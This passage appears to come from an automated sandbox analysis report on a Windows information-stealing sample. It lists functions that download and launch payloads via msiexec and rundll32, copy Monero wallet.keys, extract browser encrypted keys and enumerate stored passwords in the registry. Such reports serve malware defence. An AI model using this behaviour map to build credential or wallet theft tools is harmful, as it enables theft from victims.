                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                      • Instruction ID: 254b9fa1824602b73afabc77f72379dbb87b8c8e613d3a5df276e79038bd2b9e
                      • Opcode Fuzzy Hash: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                      • Instruction Fuzzy Hash: 9471F9B5A10208ABDB04EFE4DD89FEEB7B8BF58300F108518F516A7290DB34E905CB65
                      Function 001D2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D31C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D34EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                      • Instruction ID: a0018f5e7bf88ff4f94305a5ad43e1d39999ed3e620f65d2a5fd6b52a34daad8
                      • Opcode Fuzzy Hash: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                      • Instruction Fuzzy Hash: 831246718001589ADB09FBA0DCA2FDEB738AF34300F90416AF50676291EF742B4ACF56
                      Function 001D52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                        • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6303
                        • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                        • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C6385
                        • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                        • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                      • lstrlen.KERNEL32(00000000), ref: 001D532F
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                      • lstrlen.KERNEL32(00000000), ref: 001D5383
                      • lstrlen.KERNEL32(00000000), ref: 001D53AE
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                      • Instruction ID: d0b6ce5beaa45ba40e8219f8886eaf0dec2d32dd74162bcce9619a732fac870b
                      • Opcode Fuzzy Hash: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                      • Instruction Fuzzy Hash: 74514430950148EBCB18FF64CD96EED7779AF20301F904019F8066B292EF34AB45DBA6
                      Function 001C60A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                      • InternetOpenA.WININET(001E0DF7,00000001,00000000,00000000,00000000), ref: 001C610F
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001C618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001C61B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 001C61DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001C620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 001C6249
                      • InternetCloseHandle.WININET(?), ref: 001C6253
                      • InternetCloseHandle.WININET(00000000), ref: 001C6260
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID: (
                      • API String ID: 2507841554-2408637067
                      • Opcode ID: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                      • Instruction ID: f7bb18dd6ad4da4483ae7db160bab8219b40b6e7bcd9f6cbd505d300e665de7f
                      • Opcode Fuzzy Hash: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                      • Instruction Fuzzy Hash: 86516EB1900218ABDB20DF90DD45FEE77B8EF54701F1080A8A605A7180DB74AA85CF99
                      Function 001D12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: 11b597036127829a338d5cce3ea08b6d3b4ed9d84b18160f45e1272c54825022
                      • Instruction ID: d15f8be040c511741f54015adffa0d635f4eec132bd5d1f1c30c2a22b1d65741
                      • Opcode Fuzzy Hash: 11b597036127829a338d5cce3ea08b6d3b4ed9d84b18160f45e1272c54825022
                      • Instruction Fuzzy Hash: 82C1B8B5940219ABCB14EF60DD89FEE7378BF64304F004599F50A67381EB70AA85CF95
                      Function 001D4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D42EC
                      • lstrcat.KERNEL32(?,00E3DF68), ref: 001D430B
                      • lstrcat.KERNEL32(?,?), ref: 001D431F
                      • lstrcat.KERNEL32(?,00E3D0F0), ref: 001D4333
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                        • Part of subcall function 001C9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D93C0: GlobalAlloc.KERNEL32(00000000,001D43DD,001D43DD), ref: 001D93D3
                      • StrStrA.SHLWAPI(?,00E3E0D0), ref: 001D43F3
                      • GlobalFree.KERNEL32(?), ref: 001D4512
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                        • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                        • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 001D44A3
                      • StrCmpCA.SHLWAPI(?,001E08D1), ref: 001D44C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001D44D2
                      • lstrcat.KERNEL32(00000000,?), ref: 001D44E5
                      • lstrcat.KERNEL32(00000000,001E0FB8), ref: 001D44F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: 743f238b23dcdafc764a2a9ce5fa4f08c18c431525f21cfe7faa0dda00a6c834
                      • Instruction ID: 69fda7a01610cc7d3d1a7e2854bc4da5a0b740ac7491de670ab64febed19215f
                      • Opcode Fuzzy Hash: 743f238b23dcdafc764a2a9ce5fa4f08c18c431525f21cfe7faa0dda00a6c834
                      • Instruction Fuzzy Hash: A67166B6900218ABCB14FBA0DC99FEE7379AF98300F008599F605A7181EB75DB55CF91
                      Function 001C1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                        • Part of subcall function 001C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                        • Part of subcall function 001C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                        • Part of subcall function 001C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                        • Part of subcall function 001C12A0: RegCloseKey.ADVAPI32(?), ref: 001C12FF
                      • lstrcat.KERNEL32(?,00000000), ref: 001C134F
                      • lstrlen.KERNEL32(?), ref: 001C135C
                      • lstrcat.KERNEL32(?,.keys), ref: 001C1377
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 001C1465
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 001C14EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 83da66559a7cfb189cb7e804e90705af649cecf02309f7a8c29ad8286d0668b4
                      • Instruction ID: 808c0fcb0b31fdd8df6f84fb5ad587b7cd3fe4b345a67b0c2c82b1b44888b829
                      • Opcode Fuzzy Hash: 83da66559a7cfb189cb7e804e90705af649cecf02309f7a8c29ad8286d0668b4
                      • Instruction Fuzzy Hash: CE5157B1D5015957CB15FB60DD92FED737CAF64300F8041A9B60A62182EF706B85CFA6
                      Function 001C75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001C72D0: memset.MSVCRT ref: 001C7314
                        • Part of subcall function 001C72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                        • Part of subcall function 001C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                        • Part of subcall function 001C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                        • Part of subcall function 001C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                        • Part of subcall function 001C72D0: HeapFree.KERNEL32(00000000), ref: 001C7459
                      • lstrcat.KERNEL32(00000000,001E17FC), ref: 001C7606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001C7648
                      • lstrcat.KERNEL32(00000000, : ), ref: 001C765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001C768F
                      • lstrcat.KERNEL32(00000000,001E1804), ref: 001C76A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001C76D3
                      • lstrcat.KERNEL32(00000000,001E1808), ref: 001C76ED
                      • task.LIBCPMTD ref: 001C76FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: :
                      • API String ID: 3191641157-3653984579
                      • Opcode ID: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                      • Instruction ID: 8e2cea0fe2f44280483a916a627d2a918bc0b9fa1eded31960ce1b7a6471ee4b
                      • Opcode Fuzzy Hash: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                      • Instruction Fuzzy Hash: 87316E72900209EFCB08EBB5DD85EFE73B8BB64301B144528F102B7290DB34E956CB55
                      Function 001C72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 001C7314
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                      • HeapFree.KERNEL32(00000000), ref: 001C7459
                      • task.LIBCPMTD ref: 001C7555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
